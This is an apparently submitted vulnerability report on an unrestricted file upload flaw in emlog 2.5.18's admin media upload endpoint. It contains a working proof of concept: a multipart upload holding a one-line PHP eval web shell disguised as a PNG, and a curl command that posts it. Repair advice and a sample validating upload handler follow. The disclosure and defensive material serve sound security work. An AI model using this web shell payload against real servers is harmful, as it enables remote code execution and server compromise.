| Title | emlog.net Emlog 2.5.18 Unrestricted Upload |
|---|---|

## Description

# Projectworlds emlog Project V2.5.18 /admin/media.php?action=upload&editor=1&guid=1754908064382 File unrestricted upload
# NAME OF AFFECTED PRODUCT(S)
- emlog
## Vendor Homepage
- emlog.net
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
- l1nk
## Vulnerable File
- /admin/media.php?action=upload&editor=1&guid=1754908064382
## VERSION(S)
- V2.5.18
## Software Link
- https://www.emlog.net/
# PROBLEM TYPE
## Vulnerability Type
- File unrestricted upload
## Root Cause
- A file unrestricted upload vulnerability was found in the '/admin/media.php?action=upload&editor=1&guid=1754908064382' file of the 'emlog' project. The reason for this issue is that attackers can upload arbitrary files (including malicious scripts) through the parameter without proper verification of file type, size, content, or storage path, allowing them to execute malicious code on the server and perform unauthorized operations.
## Impact
- Attackers can exploit this file unrestricted upload vulnerability to upload malicious scripts (such as PHP, JSP, ASP files), gain server control, access or tamper with sensitive data, spread malware, and even cause service paralysis, posing a severe threat to system security and data confidentiality.
# DESCRIPTION
- During the security review of "emlog", I discovered a critical file unrestricted upload vulnerability in the "/admin/media.php?action=upload&editor=1&guid=1754908064382" file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability location:
- /admin/media.php?action=upload&editor=1&guid=1754908064382
## Payload:
```http
-----------------------------23668364613108984862299115625
Content-Disposition: form-data; name="editormd-image-file"; filename="渗透流程.php.png"
Content-Type: image/png
<?php
@eval($_POST['shell']);
?>
-----------------------------23668364613108984862299115625--
```
## The following are screenshots of some specific information obtained from testing file uploads:
```bash
curl -X POST -F "[email protected]" http://10.20.33.16/admin/media.php?action=upload&editor=1&guid=1754908064382
```
<img width="1986" height="1064" alt="Image" src="https://github.com/user-attachments/assets/ee3a0d57-34fc-4f3d-9c48-ee75ff8aa6f6" />
# Suggested repair
1. **Strict file type verification:**
Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded.
2. **Set file size limits:**
Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes.
3. **Store files outside the web root directory:**
Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files.
4. **Rename uploaded files:**
Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness.
5. **Regular security audits:**
Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner.
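The five repair points above, applied together in one upload handler. This is an added example written for this page, not emlog's own code: the field name `editormd-image-file` is taken from the report, while `UPLOAD_DIR`, `MAX_BYTES`, the allowed-type table and the function names are assumptions chosen for illustration.

```php
<?php
// Added example, not emlog's code. UPLOAD_DIR, MAX_BYTES, ALLOWED and the
// function names are assumptions; only the form field name comes from the report.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app-data/uploads';   // assumed path OUTSIDE the web root (repair 3)
const MAX_BYTES  = 2 * 1024 * 1024;            // assumed 2 MiB ceiling (repair 2)

// Extension whitelist mapped to the MIME type the file CONTENT must have (repair 1).
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one entry of $_FILES and store it under a random name.
 * Returns the on-disk path, or throws on any failed check.
 */
function storeImageUpload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload missing or failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a file uploaded in this request');
    }
    // Repair 2: size limit, checked before any content inspection.
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Repair 1a: only the LAST extension counts, and it must be whitelisted.
    // A name like "x.php.png" is therefore judged by "png", never by "php".
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Repair 1b: MIME type derived from the bytes on disk, not from the
    // client-supplied Content-Type header, which the PoC simply sets to image/png.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content type does not match extension');
    }
    // Repair 1c: content inspection; a PHP script renamed to .png does not parse as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Repair 4: random name; the original filename never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    // Repair 3: stored outside the document root, so the web server cannot execute it.
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

/**
 * Delivery script (repair 3): stream a stored image back by name; nothing is executed.
 */
function serveStoredImage(string $name): void
{
    // Accept only names of the exact shape storeImageUpload() generates.
    if (!preg_match('/^[a-f0-9]{32}\.(jpe?g|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    header('Content-Type: ' . ALLOWED[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Usage in the upload endpoint, after the authentication check the report says is absent:
// $stored = storeImageUpload($_FILES['editormd-image-file']);
```

Run against the payload in the report, the handler rejects the file twice over: `finfo` reports `text/x-php` (or `text/plain`) rather than `image/png`, and `getimagesize()` fails because the body is PHP text, so the file is never written. The extension check alone would not be enough, which is why the content checks sit behind it. Note that these checks address the upload itself; the missing authentication on the endpoint is a separate defect and still has to be fixed in the endpoint's access control.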

| Field | Value |
|---|---|
| Source | https://github.com/lan041221/cvec/issues/9 |
| User | l1nk (UID 76857) |
| Submitted | 2025-08-11 15:41 (9 months ago) |
| Moderation | 2025-08-21 07:18 (10 days later) |
| Status | Duplicate |
| VulDB entry | 320765 [Emlog Pro up to 2.5.18 media.php?action=upload&sid=0 file privilege escalation] |
| Points | 0 |